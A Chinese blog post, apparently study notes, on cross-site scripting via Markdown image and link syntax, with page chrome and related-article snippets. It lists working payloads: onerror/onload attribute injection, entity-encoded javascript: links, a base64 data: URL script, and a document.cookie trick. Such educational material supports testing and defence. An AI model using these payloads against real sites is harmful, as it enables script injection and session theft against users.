xss 之 Markdown

最新推荐文章于 2024-04-24 10:36:07 发布
最新推荐文章于 2024-04-24 10:36:07 发布
阅读量1.3k 收藏 3
点赞数 4
分类专栏: 杂记 文章标签: xss markdown
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45946673/article/details/120934990
版权

xss 之 Markdown

markdown是一种轻量级标记语言,通过简单语法,可以使文本具有一定格式,最常见于GitHub上readme文件,现这种语言已被广泛使用.

Markdown语法中易于攻击的两种

  • 图片

  • 链接

1 markdown插入图片

1.1

markdown语法:

![alt 属性文本](图片地址)

使用实例:

![RUNOOB 图标](https://img-pre.ivsky.com/img/tupian/pre/202103/29/haimian-019.jpg)

格式化后:

<p><img src="https://img-pre.ivsky.com/img/tupian/pre/202103/29/haimian-019.jpg" alt="RUNOOB 图标"></p>
1.2

可以尝试通过闭合双引号形成xss

![RUNOOB 图标](" onerror="alert('xss')")

格式化后:

<img src="" onerror="alert('xss')" alt="RUNOOB 图标">

当JavaScript代码直接放置在src或alt属性中时,因为src值为空,因此加载图像将导致代码执行错误,之后执行onerror的语句,形成xss

相同思路,也可以添加onload属性

也可以尝试将[]中的内容逃逸,[]中的内容格式化后出现在alt后

在这里插入图片描述

故可以:

![RUNOOB 图标" onload=alert(1)](https://img-pre.ivsky.com/img/tupian/pre/202103/29/haimian-019.jpg)

结果如下:

<p><img src="https://img-pre.ivsky.com/img/tupian/pre/202103/29/haimian-019.jpg" alt="RUNOOB 图标&quot; onload=alert(1)"></p>

可以发现这里出现了字符转义,所以逃逸没有成功,但是可以作为一种攻击的思路

2 markdown也可以实现链接

2.1

markdown语法:

[链接名称](链接地址)
or
<链接地址>

使用实例:

[baidu](https://baidu.com)
or
<https://baidu.com>

格式化后:

<p><a href="https://baidu.com">baidu</a>
or
<a href="https://baidu.com">https://baidu.com</a></p>
2.2

如果我们改变()中的内容

例如:

[baidu](javascript:alert(1))

格式化后:

<a href="javascript:alert(1);">baidu</a>

但是这只是理想中的格式化后结果,但是实际结果会是:

<a href="javascript:alert(1">baidu</a>)

就如以下两个语句:

[baidu](javascript:alert(1))
[baidu](javascript:alert(1&#41;)

在这里插入图片描述

结果:
在这里插入图片描述

3 实现方式

js警报

代码:

[a](javascript:alert(1&#41;)
[a](Javas&#99;ript:alert(1&#41;)

格式化:

<a href="javascript:alert(1)">a</a>
<a href="javascript:alert(1)">a</a>

结果:
在这里插入图片描述

js提示

代码:

[a](javascript:prompt(document.domain&#41;)

格式化:

<a href="javascript:prompt(document.domain)">a</a>

结果:

在这里插入图片描述

base64转换

代码:

[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)

格式化:

<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">a</a>

结果:

在这里插入图片描述

错误事件处理

代码:

[a](javascript:window.onerror=confirm;throw%20document.cookie)

格式化后:

<a href="javascript:window.onerror=confirm;throw%20document.cookie" >a</a>

结果:

在这里插入图片描述

4 总结

  • 有的cookie设置了httponly,无法用javascript获取
  • 现今诸多网站都会有过滤,HTML白名单,所以限制其实很大
  • 尽管xss-markdown限制很多,但是也还是可以作为一种攻击手段

资料参考:

https://cloud.tencent.com/developer/article/1521343

http://www.52bug.cn/hkjs/3292.html

http://kejyun.github.io/website-security-learning-notes/xss/markdown/xss-markdown-link-attack.html

没睡醒的树袋熊
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【安全漏洞】gomarkdown/markdown 项目的 XSS 漏洞产生与分析
HBohan的博客
08-24 516
前言 gomarkdown/markdown 是 Go 语言的一个流行模块,它旨在快速地将 Markdown 文档转化为 HTML 页面。而此次发现的漏洞,来源于作者在编写其语法树 Parser 的时候无意的一次 unescape。 漏洞复现 我们首先来看一段代码。 package main import ( "fmt" "github.com/gomarkdown/markdown" "html" ) func main() { var textToRender = "``
xss php 转义_Parsedown 解析 Markdown 过滤 XSS 时应如何处理 html 转义
weixin_34765773的博客
03-09 203
用 Parsedown 对 Markdown 进行解析的时候,遇到了一些 XSS 过滤方面的问题。发现 Parsedown 会对 代码 区域内的 html 代码进行转义,代码区域外的却不进行转义,如以下代码所示PHPalert('test')***/这样,这句还是被成功执行了既然如此,那我先自己给它转义一下PHP<script>alert('test')</script>*...
markdown反射型xss漏洞复现
weixin_30315905的博客
03-19 761
markdown xss漏洞复现 转载至橘子师傅:https://blog.orange.tw/2019/03/a-wormable-xss-on-hackmd.html 漏洞成因 最初是看到HackMD在前端渲染Markdown时的XSS防御所引起我的兴趣,由于HackMD允许嵌入客制化的网页标签,为了防止XSS的问题势必得对HTML进行过滤,这里HackMD使用了一个XSS防御函示库- npm...
xss文件页面内容读取(解决)
09-05
xss文件页面内容读取(解决),需要的朋友可以参考下。
Web安全之xss
白木乔
07-03 810
1&gt;XSS漏洞是Web应用程序中最常见的漏洞之一。如果您的站点没有预防XSS漏洞的固定方法,那么就存在XSS漏洞。这个利用XSS漏洞的病毒之所以具有重要意义是因为,难以看到XSS漏洞的威胁,而该病毒则将其发挥得淋漓尽致。2&gt;XSS攻击分为两类,一类是来自内部的攻击,主要指的是利用程序自身的漏洞,构造跨站语句,如:dvbbs的showerror.asp存在的跨站漏洞。3&gt;另一类则是...
了解一些xss漏洞绕过方式
贝隆的博客
02-05 1275
了解一些xss漏洞绕过方式
解析markdown_利用Markdown语法并通过Markdown和Telescope的扩展持久XSS(CVE20145144)
weixin_36258720的博客
01-15 159
点击上方蓝字,关注我们利用Markdown语法Markdown很不错。实际上,本文章本身是用Markdown编写的。对于链接,表格code blocks和列表之类的简单事物,我不需要使用冗长的不必要的HTML 。我也不需要费力地用文本做一些简单的事情,例如使单词加粗或斜体。在过去的几年中,Markdown获得了很多关注。现在,它已被Reddit,Github,StackOverflow等...
渗透测试之XSS漏洞:记一次模拟注入攻击
遇事不决 可问春风
09-18 2842
XSS(cross-site script)跨站脚本攻击是一种web应用程序前端漏洞。攻击者将代码注入,用户在使用时由浏览器对漏洞代码进行解析,从而达到恶意攻击用户的特殊目的。
XSS笔记-来源于个人思路构造以及网络分享
白昼小丑的博客
11-12 265
1)发现任何跨域请求到不受信任的域,可能会无意中执行脚本。2)找到任何可以将脚本注入数据源的可信API端点的请求。有时,正则表达式或其他定制过滤器会进行区分大小写的匹配。有时应用程序会在再次解码之前对字符串执行 XSS 过滤,这会使过滤器绕过打开它。_Note:关于构建基于flash的XSS有效负载的有用参考资料[MWR Labs](现在,我们可以使用谷歌dork在上面列出的域中找到一些JSONP端点。
网络安全之从原理看懂XSS
Galaxy_0的博客
01-18 856
网络安全之从原理看懂XSS
xss常见payload脚本
09-01
xsspayload包括各种标签的payload,类似于字典。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。...
Markdown-XSS-Payloads:XSS有效载荷,用于利用Markdown语法
05-28
Markdown XSS有效负载 XSS有效载荷,用于利用Markdown语法
markdown:ReadMe的风味Markdown解析器和基于React的渲染引擎
02-19
export default ( { body } ) => ( < div xss=removed> { rdmd ( body ) } < / div >) ;出口方式除了默认的React处理器,该软件包还导出了一些其他方法来转换自述风味的markdown: 出口描述争论react (默认)...
vm-markdown:示例
02-04
安装npm install --save vm-markdown用法< template> < vm xss=removed xss=removed xss=removed xss=removed xss=removed></ template>< script > import VmMarkdown from " vm-mark
morph:将您的Markdown文档转换成幻灯片
05-25
使用Markdown创建幻灯片。 特征 易于使用 页面过渡动画 停止移动约2秒钟时自动隐藏光标 暂停模式(黑屏) XSS保护 开发准备 npm install bower install 开发启动脚本 npm run ng.watch # after the first command ...
【Burpsuite靶场】XSS专题精讲
2302_79800344的博客
04-23 977
基于Burpsuite靶场,深度学习XSS三种类型的各类情况。
ctfshow——XSS
最新发布
qq_55202378的博客
04-24 764
跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为 XSS。恶意攻击者往 WEB 页面里插入恶意 HTML 代码,当用户浏览该页之时,嵌入其中 Web 里面的 HTML 代码会被执行,从而达到恶意攻击用户的特殊目的。
前端网络安全面试题:CSRF 与 XSS
碳基蒟蒻Serio的博客
04-22 448
跨站请求伪造是一种攻击手段,攻击者通过恶意构造一个链接或表单,诱使用户在已登录的目标网站上执行非本意的操作。当用户点击或提交这个恶意内容时,浏览器会自动带上用户的认证凭据(如session cookie),服务器误以为这是用户自己发起的合法请求,从而执行了攻击者设计的操作。例如,攻击者可能通过CSRF获取用户的转账权限,在用户不知情的情况下转走账户资金。防范措施使用CSRF令牌:服务器端为每个敏感操作生成一个一次性使用的随机令牌,并将其附加到表单中或作为Cookie的一部分发送给客户端。
xss跨站脚本(cross-site scripting)
hakksjss的博客
04-19 1176
代码,提交至服务器(可不经过),前端和后端均未对用户的输入和输出进。恶意代码不经过服务器,无需和服务器交互,发生在客户端处理数据时。等自闭和标签无需闭合,结尾尖括号也可省略,属性后记得加空格。、存在过滤属性名、标签名的情况,如果过滤不严谨可尝试双写;危害:钓鱼欺骗、获取会话、会话劫持、网页蠕虫病毒等;恶意代码经过服务器且存储于服务器(文件,数据库)、某些属性被替换,可选择大小写绕过限制。、标签内增加空白符,不影响标签原有意义。、无尖括号,可选择用事件触发。时,可选用邮箱格式,用户名。型(也算反射型的一种)
markdown-it
05-04
markdown-it 的优点之一是它可以轻松地扩展和定制。它提供了丰富的插件系统,可以让用户自定义解析器行为,增加新的语法规则和渲染器等。 此外,markdown-it 还具有高性能和安全性,它可以防止 XSS 攻击和其他安全...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值